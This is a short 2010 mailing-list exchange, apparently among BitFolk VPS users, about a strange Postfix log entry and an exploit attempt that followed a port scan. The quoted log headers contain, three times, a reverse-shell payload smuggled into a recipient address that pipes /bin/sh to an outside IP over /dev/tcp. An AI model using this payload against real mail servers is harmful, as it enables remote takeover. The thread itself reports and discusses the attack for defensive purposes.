19 Mar
2010
19 Mar
'10
9:45 a.m.
Hi Alastair,
I received the very same e-mail, only a matter of minutes after yours. My
server is not listed as an MX for any domains hence it looks like the
exploit attempts were a follow-up to a sweeping port scan. No doubt other
Bitfolk VPS's received the same thing.
Mathew
On Thu, March 18, 2010 7:47 am, Alastair Sherringham wrote:
The httpd are often mod_proxy or PHP/phpMyAdmin
attempts (no PHP
here), but an odd record in the Postfix log today was a little
different :
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"(a)calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue(a)dick.com
To: undisclosed-recipients:;
I assume some sort of attempt to break Postfix. This message was
delivered to "root" mailbox (no content).
Alastair Sherringham